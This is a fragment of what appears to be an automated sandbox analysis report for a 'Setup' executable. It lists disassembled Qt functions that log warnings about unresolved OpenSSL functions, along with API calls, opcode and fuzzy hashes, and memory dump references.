                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2523554001
                                                                                                                                                              • Opcode ID: 7e4d4a8dc06dd8ca57853c4a86bf1538ebfb87532bd3a4c1c7ef3bab2b73e11f
                                                                                                                                                              • Instruction ID: f2ae68a3ad05558d231b07717ba5b47d11967bb4729dad9db4c1ca4078a978f5
                                                                                                                                                              • Opcode Fuzzy Hash: 7e4d4a8dc06dd8ca57853c4a86bf1538ebfb87532bd3a4c1c7ef3bab2b73e11f
                                                                                                                                                              • Instruction Fuzzy Hash: FEF09095F1EA8281EBC3AB75E8112A53392AF84B10F409137DD6D4B321FE2CD0468E00
                                                                                                                                                              Function 00007FFBA1A339F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A08
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A2D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A41855), ref: 00007FFBA1A33A44
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CIPHER_description
                                                                                                                                                              • API String ID: 646154281-4149912388
                                                                                                                                                              • Opcode ID: feeb667e1a1df9108bae63c569e1858192fac83c6c368c71186f926b20f22706
                                                                                                                                                              • Instruction ID: 222100a80a6ec0217d42b8ceb155115eb3f232de80fa2a0b2d76fe8298e70dee
                                                                                                                                                              • Opcode Fuzzy Hash: feeb667e1a1df9108bae63c569e1858192fac83c6c368c71186f926b20f22706
                                                                                                                                                              • Instruction Fuzzy Hash: 20F09095F1EA8281EFC3AB75E8022A53392AF84B10F409037DD6D4B321FE2CD0468E00
                                                                                                                                                              Function 00007FFBA1A36930 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36948
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3696D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36984
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_getm_notBefore
                                                                                                                                                              • API String ID: 646154281-627992934
                                                                                                                                                              • Opcode ID: 58f98abf91624305193f85785f8364f6c192a77072e8bb27bff6197d34daf3e8
                                                                                                                                                              • Instruction ID: 5fe35a902cd57c892aeaa2cc03eed9ff89081a1aedc79bbb1bfae14f66200ecb
                                                                                                                                                              • Opcode Fuzzy Hash: 58f98abf91624305193f85785f8364f6c192a77072e8bb27bff6197d34daf3e8
                                                                                                                                                              • Instruction Fuzzy Hash: 23F0B495F0EA8281EBD39B71E8116B53392BF84B10B409437DD6D4B321FE3CE1498E00
                                                                                                                                                              Function 00007FFBA1A35120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A35138
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A3515D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45960), ref: 00007FFBA1A35174
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_new
                                                                                                                                                              • API String ID: 646154281-4035636854
                                                                                                                                                              • Opcode ID: f33494bd6e3c0270f5e8605b053ac834324da2d340bcee9840f912a335fedd72
                                                                                                                                                              • Instruction ID: 47de2e4fe0a65a2de6abf218dc27431b1a1325cfb13cf768e39ba0c4f7b69cfb
                                                                                                                                                              • Opcode Fuzzy Hash: f33494bd6e3c0270f5e8605b053ac834324da2d340bcee9840f912a335fedd72
                                                                                                                                                              • Instruction Fuzzy Hash: 4FF0B495F0EF8281EBD3AB75E8056A57392AF84B10F408137DD6D4B321FE2CD0458E00
                                                                                                                                                              Function 00007FFBA1A31990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A319A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A319CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A319E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_get_builtin_curves$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-2915546236
                                                                                                                                                              • Opcode ID: 0a2e28e2c2f627dfd8412e6fc12f8307c90f3f00a692441ee627e8248f77a650
                                                                                                                                                              • Instruction ID: 79509de97ebefa6510dd827ee56d0d4668c0b327bffce6ed8429ba459d6f1fdb
                                                                                                                                                              • Opcode Fuzzy Hash: 0a2e28e2c2f627dfd8412e6fc12f8307c90f3f00a692441ee627e8248f77a650
                                                                                                                                                              • Instruction Fuzzy Hash: 47F09095F0EA8281EBD3AB71E8112A53292BF84B10B409137DD6D8B321FE2C90458E00
                                                                                                                                                              Function 00007FFBA1A30960 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A30978
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A3099D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4101A), ref: 00007FFBA1A309B4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: BIO_ctrl$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3851655379
                                                                                                                                                              • Opcode ID: ce58a40225c3576f1e86a6092e39bb3d5583bc0001feb2831a8e20232d6869ff
                                                                                                                                                              • Instruction ID: 5a019b89935e88ac9af21661f0c35fa9f11ae8a6fbacd93a0b99e8cb83a64bc8
                                                                                                                                                              • Opcode Fuzzy Hash: ce58a40225c3576f1e86a6092e39bb3d5583bc0001feb2831a8e20232d6869ff
                                                                                                                                                              • Instruction Fuzzy Hash: 97F09695F0EA9281EBC3A735D8112A43652BF44B10B409137DD7D4B7A1FE3C94058E00
                                                                                                                                                              Function 00007FFBA1A368C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368FD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36914
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$X509_getm_notAfter
                                                                                                                                                              • API String ID: 646154281-3196714075
                                                                                                                                                              • Opcode ID: f98a506ed024266597f57e151b83708af27419c24b28636dd4bd6ee15d4c9ade
                                                                                                                                                              • Instruction ID: f4dd88890d203448cc7baebc5bd7b7ab47e9b7221d726fa91b3d0ab34e63b44c
                                                                                                                                                              • Opcode Fuzzy Hash: f98a506ed024266597f57e151b83708af27419c24b28636dd4bd6ee15d4c9ade
                                                                                                                                                              • Instruction Fuzzy Hash: D8F09095E0FA8281EBC39B71E8112A53692BF84B10B409037DD6D4B321FE2CD5058E00
                                                                                                                                                              Function 00007FFBA1A318B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A318C8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A318ED
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40DAA,?,?,?,?,00007FFBA1A24ACC), ref: 00007FFBA1A31904
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EC_KEY_get0_group$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-361053210
                                                                                                                                                              • Opcode ID: 1c007354df5a2a0466928218107a39510c5c0e2f905e3c497a404785e175a3f0
                                                                                                                                                              • Instruction ID: fe356097316089dfd36921bfce8c1b13ae296097fb703b4dbc997b80196b7b39
                                                                                                                                                              • Opcode Fuzzy Hash: 1c007354df5a2a0466928218107a39510c5c0e2f905e3c497a404785e175a3f0
                                                                                                                                                              • Instruction Fuzzy Hash: 47F09AA5E0EA8281EBC3AB71E8112A53392AF84B10B409137DD6D4B321FE2CA0498E00
                                                                                                                                                              Function 00007FFBA1A338A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A338B8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A338DD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A338F4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$RAND_status
                                                                                                                                                              • API String ID: 646154281-2320637098
                                                                                                                                                              • Opcode ID: e8d3e405caedfd7ac414d87b50f9881132c1ccbe88ecdcde53b388159867731e
                                                                                                                                                              • Instruction ID: 003a03743c1d7ea925bdcf47219d89e643d0d9f2842b5e733fa8e7bc7ca4f5a7
                                                                                                                                                              • Opcode Fuzzy Hash: e8d3e405caedfd7ac414d87b50f9881132c1ccbe88ecdcde53b388159867731e
                                                                                                                                                              • Instruction Fuzzy Hash: 01F090A5F0EA8281EBC3AB75E8112A47252BF84B20B409237ED6D4B361FE2C94558E00
                                                                                                                                                              Function 00007FFBA1A34C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C68
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C8D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34CA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_get_ciphers
                                                                                                                                                              • API String ID: 646154281-1839667981
                                                                                                                                                              • Opcode ID: 8b397acbabce264cc303b5df56e52e47e575c9a1f64103e3664a05c23d309c8c
                                                                                                                                                              • Instruction ID: 1c0c4b295c13e79524410d2a893e52473e4f1b4936861fa49ca20d51f8e93044
                                                                                                                                                              • Opcode Fuzzy Hash: 8b397acbabce264cc303b5df56e52e47e575c9a1f64103e3664a05c23d309c8c
                                                                                                                                                              • Instruction Fuzzy Hash: 89F0B495F0EA9281EBC39B71E8012B53392BF84B10F408537DD6D8B721FE2CD0058E00
                                                                                                                                                              Function 00007FFBA1A33440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33458
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A3347D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33494
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
